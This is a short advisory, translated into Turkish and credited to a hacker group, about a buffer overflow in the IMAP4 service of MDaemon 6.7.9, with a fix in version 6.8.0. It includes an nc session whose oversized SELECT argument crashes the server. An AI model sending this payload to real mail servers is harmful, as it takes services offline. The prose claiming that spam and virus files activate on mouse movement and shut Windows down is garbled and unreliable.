Mdaemon Mail server Açigi
Çeviren : Cyber-Warrior Haberci Grubu (ColaTurca)
Problem ise su :
Buffer Overflow in the IMAP4 protocol, within the
IMAP4rev1 MDaemon 6.7.9,
Bu hata makinan in restart çekmesine neden oluyor.
Yazilmis dosyalari ise bi dosyaya kopyaliyor.
Etkilenmis sistemler:
* IMAP4rev1 MDaemon 6.7.9
Immune systems:
* IMAP4rev1 MDaemon 6.8.0
Bu açikla neler yapilabilir?
Bu açikla attacker yani hacker elinde ki tüm spam ve virüslg dosyalari kisa
bi zaman da makinaya gönderebilir ve makinanin restart çekmesine sebeb olabilir.
Makina resetlendikten sonra dolayisiyla server kullanilamaz hale gelir.
Transcript
nc infowarfare.dk 143
* OK IMAP4rev1 MDaemon 6.7.9
0000 CAPABILITY
* CAPABILITY IMAP4rev1 NAMESPACE AUTH=CRAM-MD5 IDLE ACL
0000 OK CAPABILITY completed
0001 LOGIN "RealUser infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[2500 Bytes]...aaaa"
Bu atak eger basarili bi sekilde uygulanir sa windows kapanicaktir.
Bu dosyalar Kurban in ilk olarak bilgisayarin da görüneceketir.Mouse oynatmasi
ile spam ve virus dosyalari devereye girecek ve windows kapanacaktir.
Bu olay o kadar kisa bi zaman da gerçeklestirilir ki gözlerini ze inanamayabilirsiniz.
0 milliseconds a virus devreye girecektir.
Islev alani
Upgrade higher then 6.7.9